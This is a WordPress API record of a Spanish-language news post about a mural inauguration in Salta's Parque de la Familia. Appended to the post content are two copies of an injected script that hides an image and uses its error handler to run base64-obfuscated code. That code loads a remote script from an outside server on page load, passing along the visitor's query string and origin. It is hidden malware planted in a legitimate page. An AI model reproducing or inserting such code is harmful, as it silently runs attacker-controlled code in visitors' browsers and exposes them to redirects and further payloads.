{"id":3124,"date":"2023-09-21T10:45:45","date_gmt":"2023-09-21T13:45:45","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3124"},"modified":"2025-08-14T00:08:11","modified_gmt":"2025-08-14T03:08:11","slug":"hoy-sera-inaugurado-el-mural-del-parque-de-la-familia-sera-inaugurado-hoy","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3124","title":{"rendered":"Hoy ser\u00e1 inaugurado el mural del Parque de la Familia ser\u00e1 inaugurado hoy"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#941837\"><strong><em>El proyecto Camino al Origen de la Fundaci\u00f3n Pinta Argentina y John Foos ser\u00e1 inaugurado hoy jueves 21 a las 10 hs en el anfiteatro del Parque de la Familia.<\/em><\/strong><\/h4>\n\n\n\n<p>El mural realizado en el Parque de la Familia por la artista Victoria Ferreyra de la Fundaci\u00f3n&nbsp;Pinta Argentina y John Foos se inaugurar\u00e1 hoy&nbsp;jueves 21 a las 10 hs, y contar\u00e1 con la participaci\u00f3n de autoridades&nbsp;provinciales.<\/p>\n\n\n\n<p>La intervenci\u00f3n art\u00edstica se enmarca en el proyecto Camino al Origen cuyo objetivo es promover la inclusi\u00f3n y la igualdad de oportunidades; al respecto, la administradora de los Parques Urbanos&nbsp;<strong>Eleonora Gallardo<\/strong>&nbsp;destac\u00f3 que se trabaj\u00f3 con la comunidad e indic\u00f3 que el Parque de la Familia fue elegido para comenzar este Camino que se realizar\u00e1 en distintas provincias del pa\u00eds\u201d.<\/p>\n\n\n\n<p>Entre otros artistas participan Cecilia \u00c1lvarez, Lucas Castro y Seba Balate; se realizar\u00e1n murales en Tucum\u00e1n, Mendoza, C\u00f3rdoba, Mar del Plata y Uruguay. La fundaci\u00f3n Pinta Argentina fue&nbsp;fundado en el a\u00f1o 2011 por Victoria Ferreyra, inspirado en su hermana, Mar\u00eda de los \u00c1ngeles&nbsp;Ferreyra, alias Beba, artista pl\u00e1stica con s\u00edndrome de Down; en 2023, con John Foos inici\u00f3 el&nbsp;proyecto Camino al Origen.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/hoy-sera-inaugurado-el-mural-del-parque-de-la-familia-sera-inaugurado-hoy-91881\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El proyecto Camino al Origen de la Fundaci\u00f3n Pinta Argentina y John Foos ser\u00e1 inaugurado hoy jueves 21 a las 10 hs en el anfiteatro del Parque de la Familia. El mural realizado en el Parque de la Familia por la artista Victoria Ferreyra de la Fundaci\u00f3n&nbsp;Pinta Argentina y John Foos se inaugurar\u00e1 hoy&nbsp;jueves 21 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3125,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17,6],"tags":[],"class_list":{"0":"post-3124","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales","8":"category-temas-relacionados"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3124"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3124"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3124\/revisions"}],"predecessor-version":[{"id":6960,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3124\/revisions\/6960"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3125"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3124"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3124"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3124"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}